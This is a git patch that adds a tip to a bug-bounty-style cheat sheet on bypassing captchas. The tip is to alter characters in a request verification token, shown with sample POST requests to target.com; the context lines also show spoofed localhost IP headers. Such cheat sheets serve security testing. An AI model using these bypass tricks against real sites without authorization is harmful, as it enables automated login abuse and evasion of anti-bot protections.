From 3e09603c6b20819d1cb4ab489bc73b0b15837f49 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 2 Feb 2021 16:51:10 +0700
Subject: [PATCH] Daffa / Update bypass captcha

---
 Bypass Captcha.md | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/Bypass Captcha.md b/Bypass Captcha.md
index e55b84e..0c9d91b 100644
--- a/Bypass Captcha.md	
+++ b/Bypass Captcha.md	
@@ -57,3 +57,20 @@ X-Forwarded-For: 127.0.0.1
 X-Remote-IP: 127.0.0.1
 X-Remote-Addr: 127.0.0.1
 ```
+
+6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+Try this to bypass
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
+```